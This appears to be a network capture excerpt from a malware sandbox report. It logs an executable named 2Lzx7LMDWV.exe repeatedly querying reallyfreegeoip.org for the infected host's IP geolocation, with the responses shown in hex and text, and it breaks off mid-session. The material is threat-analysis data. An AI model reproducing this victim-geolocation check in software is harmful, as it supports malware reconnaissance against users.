0	192.168.2.4	49734	188.114.96.3	443	7620	C:\Users\user\Desktop\2Lzx7LMDWV.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-01 03:49:04 UTC	87	OUT	GET /xml/173.254.250.82 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-11-01 03:49:05 UTC	1214	IN	HTTP/1.1 200 OK Date: Fri, 01 Nov 2024 03:49:05 GMT Content-Type: text/xml Content-Length: 359 Connection: close x-amzn-requestid: dcb7f8fd-cb89-43da-858d-6f4f77c7b6b0 x-amzn-trace-id: Root=1-67244fb1-0547127a4d31c545397ac2c8;Parent=30ed2c4e00ab7389;Sampled=0;Lineage=1:fc9e8231:0 x-cache: Miss from cloudfront via: 1.1 a271e07df9c41dd2c067133c2d7094f0.cloudfront.net (CloudFront) x-amz-cf-pop: DFW57-P5 x-amz-cf-id: JJhBUDOUMs3p8bjG7il8adLMdGX07bMRaaR4wWJNrS_PeJVXxOHsgA== Cache-Control: max-age=31536000 CF-Cache-Status: MISS Last-Modified: Fri, 01 Nov 2024 03:49:05 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=A8MB%2FFZOXusVLRNp3%2FxYdP7L7mBi6A9%2B4BLEcycoV1llESV%2Fd99FRSBcclokAQ2I9jo6BZHBAjxDJZxY%2FmD2SQSxg%2BCfnEapLJB4YUJDVHj%2BDIa6zBnYcc1GIcpzfY9HneJ6Jngx"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8db8e9b20eae6c6b-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1123&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=2609009&cwnd=234&unsent_bytes=0&cid=3497378ef6ec438d&ts=503&x=0"
2024-11-01 03:49:05 UTC	155	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 32 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 Data Ascii: <Response><IP>173.254.250.82</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texa
2024-11-01 03:49:05 UTC	204	IN	Data Raw: 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 31 2e 30 30 36 35 3c 2f 4c 61 74 69 74 75 64 65 3e 0a 09 3c 4c 6f 6e 67 69 74 75 64 65 3e 2d 39 37 2e 38 34 30 36 3c 2f 4c 6f 6e 67 69 74 75 64 65 3e 0a 09 3c 4d 65 74 72 6f 43 6f 64 65 3e 36 32 35 3c 2f 4d 65 74 72 6f 43 6f 64 65 3e 0a 3c 2f 52 65 73 70 6f 6e 73 65 3e 0a Data Ascii: s</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>31.0065</Latitude><Longitude>-97.8406</Longitude><MetroCode>625</MetroCode></Response>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49736	188.114.96.3	443	7620	C:\Users\user\Desktop\2Lzx7LMDWV.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-01 03:49:06 UTC	63	OUT	GET /xml/173.254.250.82 HTTP/1.1 Host: reallyfreegeoip.org
2024-11-01 03:49:06 UTC	1211	IN	HTTP/1.1 200 OK Date: Fri, 01 Nov 2024 03:49:06 GMT Content-Type: text/xml Content-Length: 359 Connection: close x-amzn-requestid: dcb7f8fd-cb89-43da-858d-6f4f77c7b6b0 x-amzn-trace-id: Root=1-67244fb1-0547127a4d31c545397ac2c8;Parent=30ed2c4e00ab7389;Sampled=0;Lineage=1:fc9e8231:0 x-cache: Miss from cloudfront via: 1.1 a271e07df9c41dd2c067133c2d7094f0.cloudfront.net (CloudFront) x-amz-cf-pop: DFW57-P5 x-amz-cf-id: JJhBUDOUMs3p8bjG7il8adLMdGX07bMRaaR4wWJNrS_PeJVXxOHsgA== Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 1 Last-Modified: Fri, 01 Nov 2024 03:49:05 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CJZuv4kfsOlCXHeSmelMIP18KBI6ea8TdRqnupmEQGir%2B9fxE17KLZxGddPvExmh5dPRlL7GXucwEN4SOWD1ImU2p21%2FIMpD2OkIH7ciWf2GirPP5vdBSAUBcdmIfjrvrJaeV7ld"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8db8e9b9e90be796-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1111&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=2581105&cwnd=251&unsent_bytes=0&cid=0f818aac1ed32b7b&ts=156&x=0"
2024-11-01 03:49:06 UTC	158	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 32 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f Data Ascii: <Response><IP>173.254.250.82</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</
2024-11-01 03:49:06 UTC	201	IN	Data Raw: 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 31 2e 30 30 36 35 3c 2f 4c 61 74 69 74 75 64 65 3e 0a 09 3c 4c 6f 6e 67 69 74 75 64 65 3e 2d 39 37 2e 38 34 30 36 3c 2f 4c 6f 6e 67 69 74 75 64 65 3e 0a 09 3c 4d 65 74 72 6f 43 6f 64 65 3e 36 32 35 3c 2f 4d 65 74 72 6f 43 6f 64 65 3e 0a 3c 2f 52 65 73 70 6f 6e 73 65 3e 0a Data Ascii: RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>31.0065</Latitude><Longitude>-97.8406</Longitude><MetroCode>625</MetroCode></Response>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49739	188.114.96.3	443	7620	C:\Users\user\Desktop\2Lzx7LMDWV.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-01 03:49:07 UTC	87	OUT	GET /xml/173.254.250.82 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-11-01 03:49:07 UTC	1218	IN	HTTP/1.1 200 OK Date: Fri, 01 Nov 2024 03:49:07 GMT Content-Type: text/xml Content-Length: 359 Connection: close x-amzn-requestid: dcb7f8fd-cb89-43da-858d-6f4f77c7b6b0 x-amzn-trace-id: Root=1-67244fb1-0547127a4d31c545397ac2c8;Parent=30ed2c4e00ab7389;Sampled=0;Lineage=1:fc9e8231:0 x-cache: Miss from cloudfront via: 1.1 a271e07df9c41dd2c067133c2d7094f0.cloudfront.net (CloudFront) x-amz-cf-pop: DFW57-P5 x-amz-cf-id: JJhBUDOUMs3p8bjG7il8adLMdGX07bMRaaR4wWJNrS_PeJVXxOHsgA== Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 2 Last-Modified: Fri, 01 Nov 2024 03:49:05 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=X1F%2BKzvZw%2FA%2B6A5Fj0XtbYdTQEh%2BSGXk520x1HVE6ABJZephNo1vJcHG1qxgM4AZFlNcb889gbPcPA3TJgK9xtycGbGcCjFqDOhmFffWHeer26tSE%2BMai0IsXlrz3q%2BJ38zmGBgA"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8db8e9c40d3ee7cb-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1369&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=2032280&cwnd=32&unsent_bytes=0&cid=e188602edbb4b877&ts=187&x=0"
2024-11-01 03:49:07 UTC	151	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 32 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e Data Ascii: <Response><IP>173.254.250.82</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>
2024-11-01 03:49:07 UTC	208	IN	Data Raw: 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 31 2e 30 30 36 35 3c 2f 4c 61 74 69 74 75 64 65 3e 0a 09 3c 4c 6f 6e 67 69 74 75 64 65 3e 2d 39 37 2e 38 34 30 36 3c 2f 4c 6f 6e 67 69 74 75 64 65 3e 0a 09 3c 4d 65 74 72 6f 43 6f 64 65 3e 36 32 35 3c 2f 4d 65 74 72 6f 43 6f 64 65 3e 0a 3c 2f 52 65 73 70 6f 6e 73 65 3e 0a Data Ascii: Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>31.0065</Latitude><Longitude>-97.8406</Longitude><MetroCode>625</MetroCode></Response>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49741	188.114.96.3	443	7620	C:\Users\user\Desktop\2Lzx7LMDWV.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-01 03:49:09 UTC	63	OUT	GET /xml/173.254.250.82 HTTP/1.1 Host: reallyfreegeoip.org
2024-11-01 03:49:09 UTC	1218	IN	HTTP/1.1 200 OK Date: Fri, 01 Nov 2024 03:49:09 GMT Content-Type: text/xml Content-Length: 359 Connection: close x-amzn-requestid: dcb7f8fd-cb89-43da-858d-6f4f77c7b6b0 x-amzn-trace-id: Root=1-67244fb1-0547127a4d31c545397ac2c8;Parent=30ed2c4e00ab7389;Sampled=0;Lineage=1:fc9e8231:0 x-cache: Miss from cloudfront via: 1.1 a271e07df9c41dd2c067133c2d7094f0.cloudfront.net (CloudFront) x-amz-cf-pop: DFW57-P5 x-amz-cf-id: JJhBUDOUMs3p8bjG7il8adLMdGX07bMRaaR4wWJNrS_PeJVXxOHsgA== Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 4 Last-Modified: Fri, 01 Nov 2024 03:49:05 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=p7TwG9sLCoQYV7YAqb6t0MiguJ8l%2F0ZbYAsl2LGnwdtRTX5QWrrXywhMO2sPn%2Flz9C73eDECvhl50sPkxhiIv%2Fp1Tm%2FOLuSJC5%2B9uMxsBRFY4koo4cd3fz3DW8rU%2BWjhSXZSSJSU"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8db8e9ceb83fddb2-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1044&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=701&delivery_rate=2187311&cwnd=32&unsent_bytes=0&cid=f04ebdcb609266ef&ts=212&x=0"
2024-11-01 03:49:09 UTC	151	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 32 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e Data Ascii: <Response><IP>173.254.250.82</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>
2024-11-01 03:49:09 UTC	208	IN	Data Raw: 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 31 2e 30 30 36 35 3c 2f 4c 61 74 69 74 75 64 65 3e 0a 09 3c 4c 6f 6e 67 69 74 75 64 65 3e 2d 39 37 2e 38 34 30 36 3c 2f 4c 6f 6e 67 69 74 75 64 65 3e 0a 09 3c 4d 65 74 72 6f 43 6f 64 65 3e 36 32 35 3c 2f 4d 65 74 72 6f 43 6f 64 65 3e 0a 3c 2f 52 65 73 70 6f 6e 73 65 3e 0a Data Ascii: Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>31.0065</Latitude><Longitude>-97.8406</Longitude><MetroCode>625</MetroCode></Response>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49743	188.114.96.3	443	7620	C:\Users\user\Desktop\2Lzx7LMDWV.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-01 03:49:11 UTC	63	OUT	GET /xml/173.254.250.82 HTTP/1.1 Host: reallyfreegeoip.org
2024-11-01 03:49:11 UTC	1213	IN	HTTP/1.1 200 OK Date: Fri, 01 Nov 2024 03:49:11 GMT Content-Type: text/xml Content-Length: 359 Connection: close x-amzn-requestid: dcb7f8fd-cb89-43da-858d-6f4f77c7b6b0 x-amzn-trace-id: Root=1-67244fb1-0547127a4d31c545397ac2c8;Parent=30ed2c4e00ab7389;Sampled=0;Lineage=1:fc9e8231:0 x-cache: Miss from cloudfront via: 1.1 a271e07df9c41dd2c067133c2d7094f0.cloudfront.net (CloudFront) x-amz-cf-pop: DFW57-P5 x-amz-cf-id: JJhBUDOUMs3p8bjG7il8adLMdGX07bMRaaR4wWJNrS_PeJVXxOHsgA== Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 6 Last-Modified: Fri, 01 Nov 2024 03:49:05 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=q0%2Bdu5mukY3L3w9fzDft4aX8GzQVRv5GIqVCQBFfO%2BRKt7kvI7gpXDnN2xHgFTvipWltiXsqPEj4zW8iJd5yPOUM4kE9oS3bLU0829c4o80%2BhnKZsUKMUNYCvR8Ta7twfts9PzJL"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8db8e9d8fbc3315c-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1320&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=2182366&cwnd=245&unsent_bytes=0&cid=2c5c89ba4cac6a48&ts=157&x=0"
2024-11-01 03:49:11 UTC	156	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 32 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 Data Ascii: <Response><IP>173.254.250.82</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas
2024-11-01 03:49:11 UTC	203	IN	Data Raw: 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 31 2e 30 30 36 35 3c 2f 4c 61 74 69 74 75 64 65 3e 0a 09 3c 4c 6f 6e 67 69 74 75 64 65 3e 2d 39 37 2e 38 34 30 36 3c 2f 4c 6f 6e 67 69 74 75 64 65 3e 0a 09 3c 4d 65 74 72 6f 43 6f 64 65 3e 36 32 35 3c 2f 4d 65 74 72 6f 43 6f 64 65 3e 0a 3c 2f 52 65 73 70 6f 6e 73 65 3e 0a Data Ascii: </RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>31.0065</Latitude><Longitude>-97.8406</Longitude><MetroCode>625</MetroCode></Response>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49745	188.114.96.3	443	7620	C:\Users\user\Desktop\2Lzx7LMDWV.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-01 03:49:12 UTC	87	OUT	GET /xml/173.254.250.82 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-11-01 03:49:12 UTC	1217	IN	HTTP/1.1 200 OK Date: Fri, 01 Nov 2024 03:49:12 GMT Content-Type: text/xml Content-Length: 359 Connection: close x-amzn-requestid: dcb7f8fd-cb89-43da-858d-6f4f77c7b6b0 x-amzn-trace-id: Root=1-67244fb1-0547127a4d31c545397ac2c8;Parent=30ed2c4e00ab7389;Sampled=0;Lineage=1:fc9e8231:0 x-cache: Miss from cloudfront via: 1.1 a271e07df9c41dd2c067133c2d7094f0.cloudfront.net (CloudFront) x-amz-cf-pop: DFW57-P5 x-amz-cf-id: JJhBUDOUMs3p8bjG7il8adLMdGX07bMRaaR4wWJNrS_PeJVXxOHsgA== Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 7 Last-Modified: Fri, 01 Nov 2024 03:49:05 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Tv6dvB9Gql3XzC%2FE%2F%2BUl0rs5VZ9a6DaC%2FYT7KplXhytlTabaCss%2F5F9WAJ4R2lDlWeFzKtbucvsp9TcOMSvOJk7f5IB4qrCNUU6MXS9j14Zs9sh1EM3mllXILPbuIi8egtyAXh7m"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8db8e9e33cf16c52-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1113&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=701&delivery_rate=2654445&cwnd=251&unsent_bytes=0&cid=cf6f224f0f9f5bfd&ts=167&x=0"
2024-11-01 03:49:12 UTC	152	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 32 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 Data Ascii: <Response><IP>173.254.250.82</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>T
2024-11-01 03:49:12 UTC	207	IN	Data Raw: 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 31 2e 30 30 36 35 3c 2f 4c 61 74 69 74 75 64 65 3e 0a 09 3c 4c 6f 6e 67 69 74 75 64 65 3e 2d 39 37 2e 38 34 30 36 3c 2f 4c 6f 6e 67 69 74 75 64 65 3e 0a 09 3c 4d 65 74 72 6f 43 6f 64 65 3e 36 32 35 3c 2f 4d 65 74 72 6f 43 6f 64 65 3e 0a 3c 2f 52 65 73 70 6f 6e 73 65 3e 0a Data Ascii: exas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>31.0065</Latitude><Longitude>-97.8406</Longitude><MetroCode>625</MetroCode></Response>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49747	188.114.96.3	443	7620	C:\Users\user\Desktop\2Lzx7LMDWV.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-01 03:49:14 UTC	87	OUT	GET /xml/173.254.250.82 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-11-01 03:49:14 UTC	1214	IN	HTTP/1.1 200 OK Date: Fri, 01 Nov 2024 03:49:14 GMT Content-Type: text/xml Content-Length: 359 Connection: close x-amzn-requestid: dcb7f8fd-cb89-43da-858d-6f4f77c7b6b0 x-amzn-trace-id: Root=1-67244fb1-0547127a4d31c545397ac2c8;Parent=30ed2c4e00ab7389;Sampled=0;Lineage=1:fc9e8231:0 x-cache: Miss from cloudfront via: 1.1 a271e07df9c41dd2c067133c2d7094f0.cloudfront.net (CloudFront) x-amz-cf-pop: DFW57-P5 x-amz-cf-id: JJhBUDOUMs3p8bjG7il8adLMdGX07bMRaaR4wWJNrS_PeJVXxOHsgA== Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 9 Last-Modified: Fri, 01 Nov 2024 03:49:05 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Indw0llwBnpPj42D28vY1YG82HZh0N5El2kMvshEyE4etNW0JL3EYCzMnX97csqNusIy%2Fx1S9HvR5NCz%2Fi0bkSYoN1cDZOdd%2BbWHRL9ycz77DYqPd1YNI%2FWOzWYoFcJmxY9UpR25"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8db8e9ed4a47eb0a-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1194&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=2232845&cwnd=32&unsent_bytes=0&cid=05ee51261f93aa2e&ts=156&x=0"
2024-11-01 03:49:14 UTC	155	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 32 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 Data Ascii: <Response><IP>173.254.250.82</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texa
2024-11-01 03:49:14 UTC	204	IN	Data Raw: 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 31 2e 30 30 36 35 3c 2f 4c 61 74 69 74 75 64 65 3e 0a 09 3c 4c 6f 6e 67 69 74 75 64 65 3e 2d 39 37 2e 38 34 30 36 3c 2f 4c 6f 6e 67 69 74 75 64 65 3e 0a 09 3c 4d 65 74 72 6f 43 6f 64 65 3e 36 32 35 3c 2f 4d 65 74 72 6f 43 6f 64 65 3e 0a 3c 2f 52 65 73 70 6f 6e 73 65 3e 0a Data Ascii: s</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>31.0065</Latitude><Longitude>-97.8406</Longitude><MetroCode>625</MetroCode></Response>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49749	188.114.97.3	443	7620	C:\Users\user\Desktop\2Lzx7LMDWV.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-01 03:49:16 UTC	63	OUT	GET /xml/173.254.250.82 HTTP/1.1 Host: reallyfreegeoip.org
